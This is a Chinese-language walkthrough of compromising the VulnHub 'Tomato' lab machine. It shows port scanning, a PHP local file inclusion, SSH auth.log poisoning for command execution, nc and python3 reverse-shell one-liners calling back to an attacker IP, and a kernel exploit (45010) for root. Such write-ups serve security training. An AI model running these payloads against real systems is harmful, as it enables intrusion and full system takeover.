靶机:
https://download.vulnhub.com/tomato/Tomato.ova
难度:
- 低
目标:
- 获得 Root 权限 +Flag
攻击方法:
- 主机发现
- 端口扫描
- 信息收集
- 路径爬取
- 源码分析
- 文件包含
- 写入日志 /var/log/auth.log
- 内核漏洞枚举 les.sh
- 本地提权
主机发现
sudo arp-scan -l
端口扫描和服务发现
nmap -p- 192.168.31.23
nmap -p21,80,2211,8888 -sV 192.168.31.23
-sV:这个选项表示进行版本探测。Nmap 将尝试确定在指定端口上运行的服务的版本信息,以便于用户了解所使用的软件版本。
发现它把 SSH 服务的端口从 22 改成 2211 了
sudo nmap -p21 -sC 192.168.31.23-sC:这个选项表示启用 Nmap 的默认脚本引擎(Nmap Scripting Engine, NSE),执行与目标服务相关的默认脚本。这些脚本可以帮助获取更详细的信息和执行一些基本的安全检查。
发现没有可以用匿名 FTP 的方式
sudo nmap -p80 -sC 192.168.31.2380 端口上跟漏洞相关的信息也没有,剩下的两个端口上面也没有
浏览器直接访问Web页面,发现是一个番茄
Ctrl + U 查看源码也没有发现任何有价值的信息
访问 8888 端口发现需要账号密码,尝试了几个弱口令之后失败了,用字典暴力破解也不行
路径爬取
sudo dirb "http://192.168.31.28/"发现一个路径:/antibot_image/
在里面发现一个 info.php,里面有很多配置信息
Ctrl + U 查看源码,发现一行注释
文件包含
</?php include $_GET['image']; 这里存在一个文件包含的漏洞
这段代码存在严重的安全风险,被称为“文件包含漏洞”。如果没有对 $_GET['image'] 的输入进行严格的验证和清理,攻击者可以通过构造恶意 URL 来包含服务器上的任意文件,例如:
- 本地文件包含(LFI):攻击者可以尝试包含系统文件,如
/etc/passwd等,获取敏感信息。 - 远程文件包含(RFI):如果允许远程文件包含,攻击者可以通过 URL 远程加载恶意文件,进行代码执行或其他攻击。
那我们 GET 传参尝试进行本地文件包含,发现成功读取到了 /etc/passwd 文件的信息
http://192.168.31.28/antibot_image/antibots/info.php?image=/etc/passwd
尝试读取日志文件 /var/log/auth.log
/var/log/auth.log 是一个在许多基于 Linux 的操作系统中使用的日志文件,主要用于记录与系统认证和授权相关的事件。
auth.log 文件记录了与用户认证、登录尝试、sudo 命令的使用、身份验证失败等相关的信息。常见的内容包括:
- 成功和失败的登录尝试(例如 SSH 登录)。
- 使用
sudo命令的记录,包括执行的命令和用户。 - PAM(可插拔认证模块)相关的信息。
- 系统服务(如 SSH 登录)启动和停止的信息。
- 其他与用户权限和安全相关的事件。
view-source:http://192.168.31.28/antibot_image/antibots/info.php?image=/var/log/auth.log
那我们尝试 ssh 登录试试,日志是否会出现在这里面
ssh aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa@192.168.31.28 -p 2211
再次读取 auth.log 日志文件即可发现确实是有记录产生在这里
那么我们就可以直接写一个 php 的一句话木马过去
但是命令行这个一直失败,提示 remote username contains invalid characters,???why?为啥别人都可以,难道是我的 ssh 版本太高了导致的?啊啊啊啊啊啊啊啊啊啊啊啊啊!
two hours late..................................
那就用工具(MobaXterm1_CHS1)来连接它终于成功了
?image=/var/log/auth.log&cmd=id看一下 id 命令执行没有,发现执行了
反弹shell
?image=/var/log/auth.log&cmd=which nc看一下发现有 nc 这个工具,用 nc 来反弹 shell 发现靶机的 nc 没有 -e 参数,反弹不了
?image=/var/log/auth.log&cmd=nc -e /bin/bash 192.168.31.132 4444
view-source:http://192.168.31.32/antibot_image/antibots/info.php?image=/var/log/auth.log&cmd=which%20python3但是有 python3,那我们就用 python3 来反弹shell
在这个网站(https://forum.ywhack.com/shell.php)里有反弹 shell 大全,找一个来用
view-source:http://192.168.31.32/antibot_image/antibots/info.php?image=/var/log/auth.log&cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.31.136%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27传参之后成功反弹shell(记得把 python 改成 python3)(>_<)
按照惯例升级一下shell,python3 -c "import pty;pty.spawn('/bin/bash')"
提权
先信息收集 uname -a,发现内核是 4.4.0-21-generic
用到 linux-exploit-suggester 工具
重命名一下成 les.sh
放到目标靶机上运行一下这个脚本
靶机先启动 nc 侦听接收文件 nc -lvnp 5555 > les.sh
本机 kali 传文件 nc 192.168.31.32 5555 < les.sh -w 1
传过去之后赋予执行权限,然后运行脚本
发现第二个 exp 可以成功利用,Exposur 是 highly probable 极有可能的,然后编号是 45010
searchsploit 45010 搜索找到 45010.c
先搞到当前目录先,按理说最好到靶机上再编译这个 C 脚本,但是目标靶机上没有安装 GCC
那我们只能在我们的 kali 上面编译好了之后再传过去
靶机接收之后运行但是报错了,这个错误提示意味着你的Docker容器中缺少GLIBC_2.34版本的依赖库
GLIBC(GNU C Library)是Linux系统上最常用的C库之一,它提供了许多基本的系统函数和工具。它是Linux系统与应用程序之间的接口,用于提供操作系统级别的功能和服务。
遇到的错误信息表明您尝试运行的程序 exp 需要特定版本的 GNU C 库(glibc),即 GLIBC_2.34,但在您的系统上未找到该版本。这通常意味着您的操作系统中安装的 glibc 版本较旧。
意思就是我 kali 的 GCC 版本太高了呗,不适配它靶机
那我只能再搞一台虚拟机来了,用这台虚拟机生成的 exp 再传过去给靶机执行
下一台与靶机环境相同或相似的环境
在该环境下编译,把编译好的exp上传靶机
在靶机上赋权,执行,得到root权限
奶奶滴!我直接起一个Ubuntu16:04的 docker 容器好嘞
把 docker 容器里的文件复制出来
nc 传过去
打靶完毕!
获得flag
